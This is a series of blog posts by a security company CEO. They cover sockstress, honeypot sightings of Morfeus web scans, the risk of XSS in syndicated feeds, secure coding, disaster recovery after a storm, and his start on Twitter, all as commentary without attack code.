About Brent Huston

I am the CEO of MicroSolved, Inc. and a security evangelist. I have spent the last 20+ years working to make the Internet safer for everyone on a global scale. I believe the Internet has the capability to contribute to the next great leap for mankind, and I want to help make that happen!

The Protocol Vulnerability Game Continues…

First it was the quaking of the Earth under the weight of the DNS vulnerability that kept us awake at night. Experts predicted the demise of the Internet and cast doomsday shadows over the length of the web. Next came a laser focus on BGP and the potential for more damage to the global infrastructure. Following that came the financial crisis – which looks like it could kill the Internet from attrition when vendor, customer, banking and government dollars simply strangle it to death with a huge gasp!

Likely, we haven’t even seen the end of these other issues when a new evil raises it’s head. There has been a ton of attention on the emerging “sockstress” vulnerability. According to some sources this manipulation of TCP state tables will impact every device that can plug into a network and allow an attacker to cause denial of service outages with small amounts of bandwidth. If this is truly a protocol issue across implementations, as the researchers claim, then the effects could be huge for businesses and consumers alike.

What happens when vulnerabilities are discovered in things that can’t be patched? What happens when everyday devices that depend on networking become vulnerable to trivial exploits without mitigation? These are huge issues that impact everything from blenders to refrigerators to set top cable boxes, modems, routers and other critical systems.

Imagine the costs if your broadband ISP had to replace every modem or router in their client’s homes and businesses. What choice would they have if there were a serious vulnerability that couldn’t be fixed with a remote firmware upgrade? Even if the vulnerability could be minimized by some sort of network filtering, what else would those filters break?

It doesn’t take long to understand the potential gravity of attackers finding holes deep inside accepted and propagated protocols and applications.TCP is likely the widest used protocol on the planet. A serious hole in it, could impact risk in everything from power grid and nuclear control systems to the laundromat dryers that update a Twitter stream when they are free.

How will organizations that depend on huge industrial control systems handle these issues? What would the cost be to update/upgrade the robots that build cars at a factory to mitigate a serious hole? How many consumers would be able or willing to replace the network firewall or wireless router that they bought two years ago with new devices that were immune to a security issue?

Granted there should always be a risk versus reward equation in use, and the sky is definitely NOT falling today. But, that said, we know researchers and attackers are digging deeper and deeper into the core protocols and applications that our networks depend on. Given that fact, it seems only reasonable to assume that someday, we may have to face the idea of a hole being present in anything that plugs into a network – much of which does not have a mechanism to be patched, upgraded or protected beyond replacement. Beginning to consider this issue today just might give us some epiphanies or breakthroughs between now and the tomorrow that makes this problem real…

Book October 17th Now… E-Voting Issues with TechColumbus

We finally got everything arranged and we got all of the ducks, not just in a row, but quacking nicely together and we are going forward with the TechColumbus presentation on E-Voting. Come out on October 17th and hear about the EVEREST project, attacks against voting systems and the work that the entire EVEREST team has done to make sure that voting is more secure for Ohioans in 2008.

If you have an interest in voting security, elections or application/device security then this should be a must attend!

You can register here and get more information.

HoneyPoint:Network Trust Agent Helps IT Team Identify Serious Network Hole

We got a great story this week from a user of HoneyPoint:Network Trust Agent (NTA). This user touched base with us to let us know how his NTA deployment on his laptop helped his security team identify a critical network hole.

His story started as usual, he had downloaded NTA after one of our conferences and installed it on his laptop. He felt very strongly that it gave him unique insights into how safe he was as he traveled around and used a variety of public wi-fi and other networks. Users often tell us stories of catching various worms and scans with the product as they work from coffee shops, airports and hotels. Sure enough, the logs he sent us also showed the capture of several PHP scans and some other “wormy” activity against his laptop. He included that he has become a strong believer in “when the light turns red, it is time to go”.

But, his logs also showed us something else. He confided that his laptop had “gone red” while he was using his corporate protected network. Since this was unusual, he notified his network administration team. They, in turn, inspected his laptop and pulled his NTA log. Aghast, they found that the log contained evidence that an Internet host had attempted a telnet connection to his box. That should not be possible, since the firewall should be blocking all inbound telnet attempts. After a short discussion, the admin team analyzed the firewall rules and found a misconfiguration problem. Over the previous weekend, one of the administrators had needed to allow a remote vendor to telnet into a network device for some maintenance, however, the admin is question had applied the wrong netmask to the ACL on the firewall. This had inadvertently exposed the entire internal network to telnet probes from the global public Internet!

Obviously, the admin team took immediate action to properly configure the firewall and teach the administrator in question the proper method for ACL creation. They also began to look for other signs of intrusion and to examine the logs of routers, switches and other systems that could have been exposed to compromise from the error. After they had done a careful review and knew that they were OK, they took the time to have the gentleman let us know about their experience and thank us for the helping hand. “That may be the best 10 bucks we ever spent!”, one of the team members exclaimed.

Do you have a good story about how one of the HoneyPoint products has helped you? Have you caught malicious inbound traffic on your laptop at a coffee shop? If so, let us know.

If you are interested in learning more about HoneyPoint:Network Trust Agent, Personal Edition or our critically acclaimed Security Server product for enterprises, please feel free to email us at info<_at_>microsolved.com or give us a call. We would love to talk with you about how honeypot technologies and our products in particular can help you create effective, efficient and affordable security controls throughout your environment!

Morfeus Scanner soapCaller.bs Scans

Our HoneyPoint deployments have been picking up a recently added (August 08) scan signature from Morfeus, the bot-based web scanner, that has been around for a long time. The new scans were first detected on our consumer grade DSL/Cable segments in late August and have now also been seen on our Corporate environment sensors as well.

The scans check for “soapCaller.bs” and then “/user/soapCaller.bs”. Returning a 200 result code did not bring any additional traffic or attacks from the original source within 96 hours of the initial scans. In fact, returning the 200 did not seem to cause any change in behavior of the scans or any additional attacks from any source. Likely, this means that vulnerable hosts are being cataloged for later mass exploitation.

Morfeus scans are quite prevalent and can include searches for a number of common PHP and other web application vulnerabilities. Google searches on “morfeus” return about 259,000 results, including quite a few mentions of ongoing scans from the bot-net.

Here is a blog post that discusses using .htaccess rules to block scans with the morfeus user agent.

Morfeus has shown itself to be quite adaptive and seems to be updated pretty frequently by the bot-masters with new application attack signatures. The scanning is very widespread and can be observed on a regular basis across platforms and ISP types.

The soapCaller.bs page is a file often associated with Drupal content management system. There have been a number of vulnerabilities identified in this package in the past, including during our recent content manager testing project. Users of Drupal should be vigilant in patching the systems and in performing application assessments.

Blog Layout Plainess and Distributed, Syndicated Threats

Just got a great question about the visual layout of the blog page.

To answer the questionof why we don’t increase the “flash” of the blog page that RobM asked about, the answer comes from Marketing Guru Seth Godin – we want you to focus on the signal contained in the blog posts, not the “noise” that would enter into the equation if we added a bunch of screen gadgets, flair or other eye (and attention) grabbing stuff.

We hope that you read the blog to get information about the state of information security, technology/privacy issues and the other topics we cover here.

So, RobM, that’s the long and short of it. We want your attention to be focused on the quality of the content we deliver and nothing else. If you want to know what the latest weather forecast is, what virus alerts or the like are going on – check out one of the many information security “portals” out there. They are very high on gadgets, heads up displays and all kinds of other stuff. They certainly have their purpose, but they just present too much “noise” to “signal” for the vision of the MSI team.

That said, to keep this blog post more on topic than marketing strategy – have you ever considered the threats that could stem from syndication into things like portals? Imagine the cookie theft that be performed by a rogue entry in a syndicated RSS feed or other mechanism that got wide distribution. I know this has seen a POC in the past and I have tested more than a few RSS clients that were vulnerable to embedded XSS attacks.

One scenario that the team has discussed is the injection of XSS or the like inside of corporate feeds on the intranet. This could be a quick, easy way to gain several forms of access to a variety of internal web apps in an enterprise. Would your internal feed mechanisms catch the attack? Would your internal users be exploitable? If your organization has moved forward with embracing RSS feeds and other syndication techniques – this might be something to add to your next assessment.

Revision of Twitter Strategy

OK, I spent the last week or so working on my Twitter capability. But, I have to say, after a week, Tim Ferriss’s strategy of not following people really seems to be limiting the capabilities that Twitter seems to bring to the table in terms of information aggregation, conversation and leveraged crowd sourcing on ideas. So, effective now, I will start to follow key people who add good rapport, valuable information and good conversation.

Again, if you are interested in following me on Twitter, you can find me at http://www.twitter.com/lbhuston

I will continue to tweak out how I use Twitter and see if I can find a good leverage point for the tool. The more I learn, the more I will report back here, in the hopes of eventually being able to build a methodology of sorts….

Thanks again for reading the blog, tolerating the noise and being interested. Blogging and Twittering rank right up there with public speaking in my book. Being able to speak, teach and work with the public is one of the things that truly makes me “The Luckiest Guy In The World”(TM)…..

Google Trends Look at Vulnerabilities

This morning I ran a quick Google Trends look at three types of vulnerabilities: buffer overflows, SQL injections and cross-site scripting (XSS). The results are interesting to me, though certainly no shock.

You can view the graphs and data here.

What we see are spikes of interest in injections while both XSS and buffer overflow searches remain about the same level as they have for the last year or so. This is of course, no surprise, given the recent spate of injection compromises, defacements and malware attacks. What is interesting to me is the news graph. I did not think it would be so quite so spiky. There are a number of places where mentions in the press of both injections and XSS spike heavily. That is really good news, because it means that the mainstream press is covering those topics to a larger extent. The more mainstream press coverage the issues get, theoretically, the more awareness there should be of the topic.

Also interesting to me is that Indonesia shows up as the largest source for searches in injection and Malaysia is number 7. In XSS, Indonesia shows up at number 7, while Malaysia does not make the list. More than likely these search results are good indicators of the research and work involved between both countries in their “hacking war”, a sort of online cyber-conflict that has been taking place for the last few years without much mainstream media attention.

South Korea shows up on all of the lists as a popular source of search activity around the vulns, and some of the other countries on the list that should be drawing interest are Iran, Israel and India. Obviously, some groups in these countries are building some cyber capabilities, as they are searching on enough data to be listed. This brings up some interesting questions.

With detail analysis over long periods, perhaps this data would be useful for tracking the growth of capabilities in a given locale? Also, from a corporate security stance, is there any way that the data could be used in the short term to provide a focal lens for risk management? How could analysis of short term data be used to “forecast” potential areas of trouble in the near future? Does increased research of a topic area correlate with near future attack increases in that particular vulnerability family?

Further study into gaining intelligence from Google Trends is needed. There just might be a way to tap it for insight into emerging patterns and a deeper understanding of attack type prevalence and other indicators of underground strategic changes. Only time will tell how much power we can wring from this juicy cache of information. In the meantime, play with it a bit and see what interesting stuff you can find.

A Taste of Our Own Medicine…Real Life DR/BC Experience for the Assessors

It has been a turbulent last few days around MSI and in Central Ohio at large. On Sunday, we experienced the left overs of Hurricane Ike. Being in the mid-west, we were not quite prepared for what came our way. Wide swaths of the state experienced winds as high as those associated with a minor hurricane or tropical storm. Hundreds of thousands were left without power and damage to homes and property took a heavy toll. While the damage to our area was a minor issue compared to the beating that Houston and parts of Texas took – it was, nevertheless, a major event for us.

Today is 3 full days after the storm event here in Columbus and many remain without power and other “conveniences”. Grocery stores, gas stations and restaurants are just beginning to reopen in many parts of the city. Problems with various services and businesses abound. For example, many schools are still closed, several doctor and dentist offices still have no power and there are ongoing ups and downs for telephone services and ISPs.

Around MSI, we have been fighting the damage from the storm and Mr. Murphy. While we have been among the lucky ones to keep power on a stable basis, many of our team have been spending long hours in the conference room watching TV and playing video games after business hours. Many of them have no electricity at home, so this seems to be an easy way for them to spend some time. Our ISP has had two outages in the last two days. One was around 5 hours due to a power failure for some of the equipment that manages the “last mile” while the other was less than an hour this morning when their generator for their local data center developed an oil leak. Thankfully, both have been repaired within their SLA and none have interfered with our progress on engagements.

We have prepped our warm site for extended outages and just as we were about to activate it for these ISP outages, the connectivity returned. We have learned some lessons over the last couple of days about dealing with email outages, web presence outages and certainly gained some deeper insights into a few slight dependencies that had escaped us, even during our 2x per year DR testing. We still have some kinks to work out, but thankfully, our plans and practice paid off. We were prepared, the team knew our SLA windows for our vendors and our clients and our processes for ensuring continuation of engagements worked well!

We got to know first hand, exactly how good prep and good processes for DR/BC pay off. We took our own medicine and the taste wasn’t all that bad.

The moral of the story, I guess, is that DR/BC is a very worthwhile process. So the next time, we are doing an assessment for you and ask some tough questions about yours – don’t take it personally – as we said, we have learned first hand, just how worthwhile front-end investment can be.

Learn more about the storm:

News about the storm here.

American Electric Power outage map.

Local news.

PS – Special thanks to the folks who signed up for the State of the Threat presentation this morning. Sorry for the need to postpone it. We worked with Platform Labs throughout the day yesterday attempting to coordinate the event, but at the end of the day yesterday they still had no power. Thus, the postponement. Thanks for your patience and understanding on the issue. The good news is that Steve at Platform says they are back up and running as of this morning! Good news for Steve and everyone else!

“Secure Code” Will Save Us — Right????????

I know we have always preached that application security is much more cost effective when it is baked in. But, the reality of today’s application horizon is that security is an afterthought, at best, for a majority of web applications. A variety of reasons ranging from inexperienced developers to legacy technologies and from apathetic customers to security issues in core technologies have made this so. In fact, in our application security testing services we often encounter applications in production environments that fail to protect against attacks from 10 years ago!

The average development team we work with seems to be interested in fixing the problems, but often lack the basic understanding of how common attacks like SQL injection and XSS work. Without a basic understanding of the threats, how on earth can they be expected to protect against them? Recently, we spent more than four hours explaining the white list vs black list approaches to a certain development team who shall remain nameless. It took almost a half day of conference calls and email exchanges for them to understand how these basic approaches to filtering user input could be employed to protect their application against input validation attacks. It was not that they were not trying. The problem seemed to be that their application was developed by a small group of intern level programmers and the team members with real programming experience (the one(s) who had done the engineering and application design) were long since gone from the company or reassigned to other projects. Without experienced oversight and guidance, the interns had produced working code for sure, but without any underlying controls, security, availability or reliability!

Today, if we look at the marketplace, there are a ton of solutions attempting to bolt on security after the fact. Everything from code scanners to web application firewalls are emerging as controls to help organizations deal with web application security. One of the big problems with these technologies is that they require changes to the underlying source code, logic or web server environments. At the very least, WAFs act as a filtering device at the protocol layer, and many applications simply perform unreliably when a WAF is “protecting them”. What we really need is a reliable way to add security to web applications without changes to protocols, environments or logic.

Of course, the ultimate argument is that what we really need is secure code. I have read a lot of security pundits lately talking about how “secure code” is the solution. “Secure code” has become the latest battle cry, silver bullet, smoke and mirror trick and marketing hype. However, “secure coding” is not easy. It is not immediately available for most organizations – there is no switch to flip on your developers to make them churn out “secure code” – there is no ONE class or seminar you can send them to make them write “secure code”. Instead, it takes ongoing education, updates to existing code tools, frameworks and development environments. It will be a long, slow process. It will be a human process and it will be expensive.

Even then, once we get all of our programmers making “secure code”, there will still be problems. New attack formats will arrive. Legacy applications will still have old issues – some may be rewritten, but it won’t be cost effective for all web applications. New technologies and web enhancements will certainly degrade the security posture of even today’s most hardened web application. In other words – as you have heard me say before – Security is a journey, not a destination. We won’t get all of our code secure. We will never cross the line when all web apps are safe. We will simply move closer to a time when a majority of web applications are secure enough to meet our level of risk tolerance. Even then, that moment is likely fleeting. The center will not hold. The universe breaks down upon itself. Entropy is a true constant in the universe, even the security universe. The center will just not hold……

Want More Random Content and Noise in Your Life?

For those of you who want more random noise and content but just can’t get enough of it on the web, I have decided to take up this “Twitter thing”. 😉

Everyone keeps telling me that I need to do it, so I am trying hard to embrace it.

If you are interested in “following me” you can do so here: http://twitter.com/lbhuston

Two caveats: 1. There is likely to be a random element to the content and frequency of the feed. 2. There is likely to be a mix of personal stuff, marketing, security thought, musings, rants, etc. The twitter-sphere seems to encourage this mixture of transparency and actual deep work thought.

Lastly, I have decided to only follow two people thus far: Guy Kawasaki and Timothy Ferriss – two of my favorite authors. That said, if you don’t see me following you directly or decide to get offended if I don’t follow you – please excuse me ahead of time. So far, keeping up with the twitters from those two, attempting to add my own content and doing the day to day work of leading MSI seems to be consuming all of the cycles I have, so please don’t take it personally if I don’t follow you in return….

OK that’s about it for this post. If the last thing you would want in your life is more Brent Huston, don’t feel bad or anything. Believe me, I understand. 🙂

BTW – If you want to check out books by those two authors, they are both excellent. Their books have helped me build MSI and have even helped me gain some level of illusion of control over my personal life.